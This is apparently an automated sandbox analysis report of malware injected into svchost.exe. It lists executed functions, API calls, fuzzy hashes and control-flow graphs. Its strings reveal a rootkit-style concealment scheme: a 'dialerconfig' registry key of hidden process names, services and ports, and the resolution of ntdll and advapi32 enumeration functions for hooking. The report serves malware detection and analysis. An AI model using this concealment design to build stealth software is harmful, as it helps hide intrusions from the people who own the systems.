                                                    • Instruction ID: 75a686c1a9a1d8f08dd2c77f67f6b0a8b1bbc4b3db12b6a12dbff55774f20d2f
                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction Fuzzy Hash: 6AE03235F01A0886EB08CB66D80834A37E1EB9AB0AF0A8024890907365DF7E8499CB90

                                                    Execution Graph

                                                    Execution Coverage:0.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:81
                                                    Total number of Limit Nodes:2
                                                    execution_graph 14943 2a3effc273c 14944 2a3effc276a 14943->14944 14945 2a3effc2858 LoadLibraryA 14944->14945 14946 2a3effc28d4 14944->14946 14945->14944 14947 2a3f0661abc 14953 2a3f0661628 GetProcessHeap 14947->14953 14949 2a3f0661ad2 Sleep SleepEx 14951 2a3f0661acb 14949->14951 14951->14949 14952 2a3f0661598 StrCmpIW StrCmpW 14951->14952 14998 2a3f06618b4 14951->14998 14952->14951 14954 2a3f0661648 __std_exception_copy 14953->14954 15015 2a3f0661268 GetProcessHeap 14954->15015 14956 2a3f0661650 14957 2a3f0661268 2 API calls 14956->14957 14958 2a3f0661661 14957->14958 14959 2a3f0661268 2 API calls 14958->14959 14960 2a3f066166a 14959->14960 14961 2a3f0661268 2 API calls 14960->14961 14962 2a3f0661673 14961->14962 14963 2a3f066168e RegOpenKeyExW 14962->14963 14964 2a3f06618a6 14963->14964 14965 2a3f06616c0 RegOpenKeyExW 14963->14965 14964->14951 14966 2a3f06616e9 14965->14966 14967 2a3f06616ff RegOpenKeyExW 14965->14967 15019 2a3f06612bc RegQueryInfoKeyW 14966->15019 14969 2a3f066173a RegOpenKeyExW 14967->14969 14970 2a3f0661723 14967->14970 14973 2a3f0661775 RegOpenKeyExW 14969->14973 14974 2a3f066175e 14969->14974 15030 2a3f066104c RegQueryInfoKeyW 14970->15030 14971 2a3f06616f5 RegCloseKey 14971->14967 14975 2a3f0661799 14973->14975 14976 2a3f06617b0 RegOpenKeyExW 14973->14976 14978 2a3f06612bc 11 API calls 14974->14978 14979 2a3f06612bc 11 API calls 14975->14979 14980 2a3f06617d4 14976->14980 14981 2a3f06617eb RegOpenKeyExW 14976->14981 14982 2a3f066176b RegCloseKey 14978->14982 14983 2a3f06617a6 RegCloseKey 14979->14983 14984 2a3f06612bc 11 API calls 14980->14984 14985 2a3f0661826 RegOpenKeyExW 14981->14985 14986 2a3f066180f 14981->14986 14982->14973 14983->14976 14987 2a3f06617e1 RegCloseKey 14984->14987 14989 2a3f066184a 14985->14989 14990 2a3f0661861 RegOpenKeyExW 14985->14990 14988 2a3f066104c 4 API calls 14986->14988 14987->14981 14993 2a3f066181c RegCloseKey 14988->14993 14994 2a3f066104c 4 API calls 14989->14994 14991 2a3f0661885 14990->14991 14992 2a3f066189c RegCloseKey 14990->14992 14995 2a3f066104c 4 API calls 14991->14995 14992->14964 14993->14985 14996 2a3f0661857 RegCloseKey 14994->14996 14997 2a3f0661892 RegCloseKey 14995->14997 14996->14990 14997->14992 15043 2a3f06614a4 14998->15043 15036 2a3f0676168 15015->15036 15018 2a3f06612ae __std_exception_copy 15018->14956 15020 2a3f066148a __free_lconv_num 15019->15020 15021 2a3f0661327 GetProcessHeap 15019->15021 15020->14971 15024 2a3f066133e __std_exception_copy __free_lconv_num 15021->15024 15022 2a3f0661476 GetProcessHeap 15022->15020 15023 2a3f0661352 RegEnumValueW 15023->15024 15024->15022 15024->15023 15026 2a3f06613d3 GetProcessHeap 15024->15026 15027 2a3f066141e lstrlenW GetProcessHeap 15024->15027 15028 2a3f0661443 StrCpyW 15024->15028 15029 2a3f06613f3 GetProcessHeap 15024->15029 15038 2a3f066152c 15024->15038 15026->15024 15027->15024 15028->15024 15029->15024 15031 2a3f06611b5 RegCloseKey 15030->15031 15033 2a3f06610bf __std_exception_copy __free_lconv_num 15030->15033 15031->14969 15032 2a3f06610cf RegEnumValueW 15032->15033 15033->15031 15033->15032 15034 2a3f066114e GetProcessHeap 15033->15034 15035 2a3f066116e GetProcessHeap 15033->15035 15034->15033 15035->15033 15037 2a3f0661283 GetProcessHeap 15036->15037 15037->15018 15039 2a3f0661546 15038->15039 15040 2a3f066157c 15038->15040 15039->15040 15041 2a3f0661565 StrCmpW 15039->15041 15042 2a3f066155d StrCmpIW 15039->15042 15040->15024 15041->15039 15042->15039 15044 2a3f06614e1 GetProcessHeap 15043->15044 15045 2a3f06614c1 GetProcessHeap 15043->15045 15049 2a3f0676180 15044->15049 15047 2a3f06614da __free_lconv_num 15045->15047 15047->15044 15047->15045 15050 2a3f06614f6 GetProcessHeap HeapFree 15049->15050

                                                    Executed Functions

                                                    Function 000002A3F0661628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                    • API String ID: 106492572-2879589442
                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction ID: d6e49efe3d81a32690fa77fe862616ae2cfdfda5e723070bc013a806f6e0db3f
                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction Fuzzy Hash: 5E71EB26B20A508BEB90DF69EC5865D2374F7A7B88F041121F94E9BF69EE34C644C741
                                                    Function 000002A3F066328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                    • String ID:
                                                    • API String ID: 1683269324-0
                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction ID: 7e9bf6ca3dc4cd1ea628d8b54d7181c9f962757dd9737672e5874ad7b75af4a2
                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction Fuzzy Hash: 53110370F306918BFAE0DB29AE4D3AD2294EB67348F504138B906D9E91FF78C2448642
                                                    Function 000002A3F0661ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 000002A3F0661628: GetProcessHeap.KERNEL32 ref: 000002A3F0661633
                                                      • Part of subcall function 000002A3F0661628: HeapAlloc.KERNEL32 ref: 000002A3F0661642
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06616B2
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06616DF
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F06616F9
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661719
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F0661734
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661754
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F066176F
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066178F
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F06617AA
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617CA
                                                    • Sleep.KERNEL32 ref: 000002A3F0661AD7
                                                    • SleepEx.KERNELBASE ref: 000002A3F0661ADD
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F06617E5
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661805
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F0661820
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661840
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F066185B
                                                      • Part of subcall function 000002A3F0661628: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066187B
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F0661896
                                                      • Part of subcall function 000002A3F0661628: RegCloseKey.ADVAPI32 ref: 000002A3F06618A0
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1534210851-0
                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction ID: 18493aa65fc7477a11afd4ac97f0363bec50394c762ef9b304816d61159171c0
                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction Fuzzy Hash: 6631B451B205414BEFD0DB2ADE6936D53A4EBA7BC4F0C5431AE0ACFA95FE34C6518212
                                                    Function 000002A3EFFC273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 110 2a3effc273c-2a3effc27a4 call 2a3effc29d4 * 4 119 2a3effc29b2 110->119 120 2a3effc27aa-2a3effc27ad 110->120 122 2a3effc29b4-2a3effc29d0 119->122 120->119 121 2a3effc27b3-2a3effc27b6 120->121 121->119 123 2a3effc27bc-2a3effc27bf 121->123 123->119 124 2a3effc27c5-2a3effc27e6 123->124 124->119 126 2a3effc27ec-2a3effc280c 124->126 127 2a3effc280e-2a3effc2836 126->127 128 2a3effc2838-2a3effc283f 126->128 127->127 127->128 129 2a3effc28df-2a3effc28e6 128->129 130 2a3effc2845-2a3effc2852 128->130 131 2a3effc2992-2a3effc29b0 129->131 132 2a3effc28ec-2a3effc2901 129->132 130->129 133 2a3effc2858-2a3effc286a LoadLibraryA 130->133 131->122 132->131 134 2a3effc2907 132->134 135 2a3effc286c-2a3effc2878 133->135 136 2a3effc28ca-2a3effc28d2 133->136 139 2a3effc290d-2a3effc2921 134->139 140 2a3effc28c5-2a3effc28c8 135->140 136->133 137 2a3effc28d4-2a3effc28d9 136->137 137->129 142 2a3effc2982-2a3effc298c 139->142 143 2a3effc2923-2a3effc2934 139->143 140->136 141 2a3effc287a-2a3effc287d 140->141 147 2a3effc287f-2a3effc28a5 141->147 148 2a3effc28a7-2a3effc28b7 141->148 142->131 142->139 145 2a3effc293f-2a3effc2943 143->145 146 2a3effc2936-2a3effc293d 143->146 150 2a3effc294d-2a3effc2951 145->150 151 2a3effc2945-2a3effc294b 145->151 149 2a3effc2970-2a3effc2980 146->149 152 2a3effc28ba-2a3effc28c1 147->152 148->152 149->142 149->143 154 2a3effc2963-2a3effc2967 150->154 155 2a3effc2953-2a3effc2961 150->155 151->149 152->140 154->149 156 2a3effc2969-2a3effc296c 154->156 155->149 156->149
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction ID: 0f6afa320c4a75fa81fbb62ff1d4a206d0eb164a0ac9f5765956537095b3a2cd
                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction Fuzzy Hash: 10613432B012A087DB68CF15C60872D7392FB95BA4F188123EE5983BC8DE78D953D709

                                                    Non-executed Functions

                                                    Function 000002A3F0662B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 365 2a3f0662b2c-2a3f0662ba5 call 2a3f0682ce0 368 2a3f0662ee0-2a3f0662f03 365->368 369 2a3f0662bab-2a3f0662bb1 365->369 369->368 370 2a3f0662bb7-2a3f0662bba 369->370 370->368 371 2a3f0662bc0-2a3f0662bc3 370->371 371->368 372 2a3f0662bc9-2a3f0662bd9 GetModuleHandleA 371->372 373 2a3f0662bed 372->373 374 2a3f0662bdb-2a3f0662beb GetProcAddress 372->374 375 2a3f0662bf0-2a3f0662c0e 373->375 374->375 375->368 377 2a3f0662c14-2a3f0662c33 StrCmpNIW 375->377 377->368 378 2a3f0662c39-2a3f0662c3d 377->378 378->368 379 2a3f0662c43-2a3f0662c4d 378->379 379->368 380 2a3f0662c53-2a3f0662c5a 379->380 380->368 381 2a3f0662c60-2a3f0662c73 380->381 382 2a3f0662c75-2a3f0662c81 381->382 383 2a3f0662c83 381->383 384 2a3f0662c86-2a3f0662c8a 382->384 383->384 385 2a3f0662c9a 384->385 386 2a3f0662c8c-2a3f0662c98 384->386 387 2a3f0662c9d-2a3f0662ca7 385->387 386->387 388 2a3f0662d9d-2a3f0662da1 387->388 389 2a3f0662cad-2a3f0662cb0 387->389 390 2a3f0662da7-2a3f0662daa 388->390 391 2a3f0662ed2-2a3f0662eda 388->391 392 2a3f0662cc2-2a3f0662ccc 389->392 393 2a3f0662cb2-2a3f0662cbf call 2a3f066199c 389->393 394 2a3f0662dbb-2a3f0662dc5 390->394 395 2a3f0662dac-2a3f0662db8 call 2a3f066199c 390->395 391->368 391->381 397 2a3f0662d00-2a3f0662d0a 392->397 398 2a3f0662cce-2a3f0662cdb 392->398 393->392 402 2a3f0662dc7-2a3f0662dd4 394->402 403 2a3f0662df5-2a3f0662df8 394->403 395->394 399 2a3f0662d3a-2a3f0662d3d 397->399 400 2a3f0662d0c-2a3f0662d19 397->400 398->397 405 2a3f0662cdd-2a3f0662cea 398->405 407 2a3f0662d3f-2a3f0662d49 call 2a3f0661bbc 399->407 408 2a3f0662d4b-2a3f0662d58 lstrlenW 399->408 400->399 406 2a3f0662d1b-2a3f0662d28 400->406 402->403 410 2a3f0662dd6-2a3f0662de3 402->410 411 2a3f0662dfa-2a3f0662e03 call 2a3f0661bbc 403->411 412 2a3f0662e05-2a3f0662e12 lstrlenW 403->412 413 2a3f0662ced-2a3f0662cf3 405->413 418 2a3f0662d2b-2a3f0662d31 406->418 407->408 415 2a3f0662d93-2a3f0662d98 407->415 420 2a3f0662d5a-2a3f0662d64 408->420 421 2a3f0662d7b-2a3f0662d8d call 2a3f0663844 408->421 422 2a3f0662de6-2a3f0662dec 410->422 411->412 432 2a3f0662e4a-2a3f0662e55 411->432 416 2a3f0662e35-2a3f0662e3f call 2a3f0663844 412->416 417 2a3f0662e14-2a3f0662e1e 412->417 414 2a3f0662cf9-2a3f0662cfe 413->414 413->415 414->397 414->413 426 2a3f0662e42-2a3f0662e44 415->426 416->426 417->416 427 2a3f0662e20-2a3f0662e33 call 2a3f066152c 417->427 418->415 428 2a3f0662d33-2a3f0662d38 418->428 420->421 431 2a3f0662d66-2a3f0662d79 call 2a3f066152c 420->431 421->415 421->426 422->432 433 2a3f0662dee-2a3f0662df3 422->433 426->391 426->432 427->416 427->432 428->399 428->418 431->415 431->421 437 2a3f0662e57-2a3f0662e5b 432->437 438 2a3f0662ecc-2a3f0662ed0 432->438 433->403 433->422 441 2a3f0662e63-2a3f0662e7d call 2a3f06685c0 437->441 442 2a3f0662e5d-2a3f0662e61 437->442 438->391 444 2a3f0662e80-2a3f0662e83 441->444 442->441 442->444 446 2a3f0662e85-2a3f0662ea3 call 2a3f06685c0 444->446 447 2a3f0662ea6-2a3f0662ea9 444->447 446->447 447->438 450 2a3f0662eab-2a3f0662ec9 call 2a3f06685c0 447->450 450->438
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                    • API String ID: 2119608203-3850299575
                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction ID: e7264185e6627ca7a152c45ea673191d5828ce264668469caef4e6d9760e183d
                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                    • Instruction Fuzzy Hash: 1CB17161B20A528BEBD4CF29D85876D63A4FB67B88F045035F9499BF94EE35CA40C341
                                                    Function 000002A3F0667D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction ID: 8a2399726a7e03ffd8de5c654530bf9e493a26281a99b78894901c300c8f31c7
                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                    • Instruction Fuzzy Hash: 7A315E72725B808AEBA0DF64E8543ED7360F796744F44443AEA4D87B95EF38C648C711
                                                    Function 000002A3F066D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 1239891234-0
                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction ID: 4648a46d89f0ed24374a6d89c06c8292b8bddab6eb90024b74db4ccdf504cc36
                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                    • Instruction Fuzzy Hash: 04315D32B24B808ADBA0CB29E8443AE73A4F79A754F500125FA9D87B55EF38C245CB01
                                                    Function 000002A3F06612BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                    • String ID: d
                                                    • API String ID: 2005889112-2564639436
                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction ID: 6d6c9081a9e9c9d4ad7192b94bb72c94a9a7c429cca7302e1de0babd91853f21
                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                    • Instruction Fuzzy Hash: A2516E32B10B848BEB94CF6AE94C35A77A1F79AB99F444134EA494BB18EF3CC145C701
                                                    Function 000002A3F0661D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3045453060.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3f0660000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                    • API String ID: 4175298099-1975688563
                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction ID: f24ac17cebfaa1330c927da688690566a7c830514d95f9ff872cdd76f91d0775
                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                    • Instruction Fuzzy Hash: 3531B9A4F30947ABEAC1DB5DED596E82360FB23748F840533B4099AD61FE788349C352
                                                    Function 000002A3EFFC6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 207 2a3effc6910-2a3effc6916 208 2a3effc6951-2a3effc695b 207->208 209 2a3effc6918-2a3effc691b 207->209 212 2a3effc6a78-2a3effc6a8d 208->212 210 2a3effc691d-2a3effc6920 209->210 211 2a3effc6945-2a3effc6984 call 2a3effc6fc0 209->211 213 2a3effc6922-2a3effc6925 210->213 214 2a3effc6938 __scrt_dllmain_crt_thread_attach 210->214 227 2a3effc6a52 211->227 228 2a3effc698a-2a3effc699f call 2a3effc6e54 211->228 215 2a3effc6a8f 212->215 216 2a3effc6a9c-2a3effc6ab6 call 2a3effc6e54 212->216 218 2a3effc6931-2a3effc6936 call 2a3effc6f04 213->218 219 2a3effc6927-2a3effc6930 213->219 222 2a3effc693d-2a3effc6944 214->222 220 2a3effc6a91-2a3effc6a9b 215->220 230 2a3effc6aef-2a3effc6b20 call 2a3effc7190 216->230 231 2a3effc6ab8-2a3effc6aed call 2a3effc6f7c call 2a3effc6e1c call 2a3effc7318 call 2a3effc7130 call 2a3effc7154 call 2a3effc6fac 216->231 218->222 232 2a3effc6a54-2a3effc6a69 227->232 239 2a3effc6a6a-2a3effc6a77 call 2a3effc7190 228->239 240 2a3effc69a5-2a3effc69b6 call 2a3effc6ec4 228->240 241 2a3effc6b31-2a3effc6b37 230->241 242 2a3effc6b22-2a3effc6b28 230->242 231->220 239->212 259 2a3effc6a07-2a3effc6a11 call 2a3effc7130 240->259 260 2a3effc69b8-2a3effc69dc call 2a3effc72dc call 2a3effc6e0c call 2a3effc6e38 call 2a3effcac0c 240->260 247 2a3effc6b7e-2a3effc6b94 call 2a3effc268c 241->247 248 2a3effc6b39-2a3effc6b43 241->248 242->241 246 2a3effc6b2a-2a3effc6b2c 242->246 253 2a3effc6c1f-2a3effc6c2c 246->253 268 2a3effc6bcc-2a3effc6bce 247->268 269 2a3effc6b96-2a3effc6b98 247->269 254 2a3effc6b4f-2a3effc6b5d call 2a3effd5780 248->254 255 2a3effc6b45-2a3effc6b4d 248->255 262 2a3effc6b63-2a3effc6b78 call 2a3effc6910 254->262 272 2a3effc6c15-2a3effc6c1d 254->272 255->262 259->227 280 2a3effc6a13-2a3effc6a1f call 2a3effc7180 259->280 260->259 310 2a3effc69de-2a3effc69e5 __scrt_dllmain_after_initialize_c 260->310 262->247 262->272 270 2a3effc6bd0-2a3effc6bd3 268->270 271 2a3effc6bd5-2a3effc6bea call 2a3effc6910 268->271 269->268 277 2a3effc6b9a-2a3effc6bbc call 2a3effc268c call 2a3effc6a78 269->277 270->271 270->272 271->272 289 2a3effc6bec-2a3effc6bf6 271->289 272->253 277->268 304 2a3effc6bbe-2a3effc6bc6 call 2a3effd5780 277->304 297 2a3effc6a21-2a3effc6a2b call 2a3effc7098 280->297 298 2a3effc6a45-2a3effc6a50 280->298 294 2a3effc6c01-2a3effc6c11 call 2a3effd5780 289->294 295 2a3effc6bf8-2a3effc6bff 289->295 294->272 295->272 297->298 309 2a3effc6a2d-2a3effc6a3b 297->309 298->232 304->268 309->298 310->259 311 2a3effc69e7-2a3effc6a04 call 2a3effcabc8 310->311 311->259
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002E.00000002.3039339786.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_46_2_2a3effc0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                    • API String ID: 190073905-1786718095
                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction ID: dc9269e48c0f5cace3bc677973e2ab88cdbd6d3f94d8d7241233d29b055281a4
                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                    • Instruction Fuzzy Hash: C581022170826187FB54EB6597483992290EF87B80F588027BA0DC7796DFF9CB47830B
                                                    Function 000002A3F066CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 000002A3F066CE37
                                                    • FlsGetValue.KERNEL32(?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CE4C
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CE6D
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CE9A
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CEAB
                                                    • FlsSetValue.KERNEL32(?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CEBC
                                                    • SetLastError.KERNEL32 ref: 000002A3F066CED7
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CF0D
                                                    • FlsSetValue.KERNEL32(?,?,00000001,000002A3F066ECCC,?,?,?,?,000002A3F066BF9F,?,?,?,?,?,000002A3F0667AB0), ref: 000002A3F066CF2C
                                                      • Part of subcall function 000002A3F066D6CC: HeapAlloc.KERNEL32 ref: 000002A3F066D721
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CF54
                                                      • Part of subcall function 000002A3F066D744: HeapFree.KERNEL32 ref: 000002A3F066D75A
                                                      • Part of subcall function 000002A3F066D744: GetLastError.KERNEL32 ref: 000002A3F066D764
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A3F0670A6B,?,?,?,000002A3F067045C,?,?,?,000002A3F066C84F), ref: 000002A3F066CF65
